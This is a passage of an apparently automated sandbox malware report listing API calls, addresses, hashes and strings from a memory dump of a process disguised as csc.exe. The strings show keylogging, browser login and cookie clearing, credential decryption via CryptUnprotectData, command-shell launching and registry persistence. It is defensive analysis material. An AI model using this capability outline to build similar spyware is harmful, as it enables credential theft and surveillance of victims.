                                      • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe,00000104), ref: 00440975
                                      • _free.LIBCMT ref: 00440A40
                                      • _free.LIBCMT ref: 00440A4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      • API String ID: 2506810119-4268453932
                                      • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                      • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                      • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                      • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                      APIs
                                        • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                        • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                        • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                      • _wcslen.LIBCMT ref: 00419744
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$program files (x86)\$program files\
                                      • API String ID: 37874593-1203593143
                                      • Opcode ID: 2f4f481f0161396d07103ad7c8d061b93d78892436a402ceba5d5bc83ad8813a
                                      • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                      • Opcode Fuzzy Hash: 2f4f481f0161396d07103ad7c8d061b93d78892436a402ceba5d5bc83ad8813a
                                      • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                      • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0040929B
                                      • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 004092A7
                                        • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A0BE
                                        • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: bb1cb1056f73d584da7c36c72b212fdceed89e22323dc354eebbcaa29568f40c
                                      • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                      • Opcode Fuzzy Hash: bb1cb1056f73d584da7c36c72b212fdceed89e22323dc354eebbcaa29568f40c
                                      • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                      APIs
                                        • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A0BE
                                        • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                      • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      • Opcode ID: 506e85419a94894cdd11ea2a88f5c3e00309ac2605dcb9d9fcc232879bb79a9e
                                      • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                      • Opcode Fuzzy Hash: 506e85419a94894cdd11ea2a88f5c3e00309ac2605dcb9d9fcc232879bb79a9e
                                      • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                      • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                      • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                      • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                      • CloseHandle.KERNEL32(?), ref: 004051AA
                                      • SetEvent.KERNEL32(?), ref: 004051B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                      • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                      • Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                      • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                      • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                      • Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                      • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: 9378fcd8caae245c736563db76b387cdb73b17417030eb628b0b948aaaf6b675
                                      • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                      • Opcode Fuzzy Hash: 9378fcd8caae245c736563db76b387cdb73b17417030eb628b0b948aaaf6b675
                                      • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                      Strings
                                      • http\shell\open\command, xrefs: 00412026
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: http\shell\open\command
                                      • API String ID: 3677997916-1487954565
                                      • Opcode ID: 5c4005ad44903682da83c2e9f1fb6033cf1e197c439734e60bec94162d8ab710
                                      • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                      • Opcode Fuzzy Hash: 5c4005ad44903682da83c2e9f1fb6033cf1e197c439734e60bec94162d8ab710
                                      • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
                                      • RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
                                      • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      • Opcode ID: af712f90279a550984c924f2865371c0ac49984d37eefe109e735c7a861c3c27
                                      • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                      • Opcode Fuzzy Hash: af712f90279a550984c924f2865371c0ac49984d37eefe109e735c7a861c3c27
                                      • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                        • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                        • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                      • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                      • Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                      • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                      • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: P0F
                                      • API String ID: 1818849710-3540264436
                                      • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                      • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                      • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                      • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                      • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                      • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                      • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                      • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                      • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                      • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                      • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                      • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                      • Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                      • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                      • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                      • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                      • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                      • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                      • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                      • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                      • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3360349984-0
                                      • Opcode ID: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                      • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                      • Opcode Fuzzy Hash: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                      • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                      APIs
                                      Strings
                                      • Cleared browsers logins and cookies., xrefs: 0040B036
                                      • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                      • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                      • Opcode Fuzzy Hash: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
                                      • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                      APIs
                                        • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                        • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                        • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                      • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQuerySleepValue
                                      • String ID: H"G$exepath$!G
                                      • API String ID: 4119054056-2148977334
                                      • Opcode ID: 6336de1d21d17064d1b4c0b8415e2737fe0bf0d6cd47612320ce1deb547ff70d
                                      • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                      • Opcode Fuzzy Hash: 6336de1d21d17064d1b4c0b8415e2737fe0bf0d6cd47612320ce1deb547ff70d
                                      • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                      APIs
                                        • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                        • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                        • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                      • Sleep.KERNEL32(000001F4), ref: 0040955A
                                      • Sleep.KERNEL32(00000064), ref: 004095F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 068b05e547a1d797d7ec17d7d94ae4c152319093ce8e8ee8dcad1b8bad44d748
                                      • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                      • Opcode Fuzzy Hash: 068b05e547a1d797d7ec17d7d94ae4c152319093ce8e8ee8dcad1b8bad44d748
                                      • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                      • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                      • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                      • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                      • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                      • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                      • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                      • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                      • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                      • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                      • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                      • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                      • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                      • Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                      • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                        • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
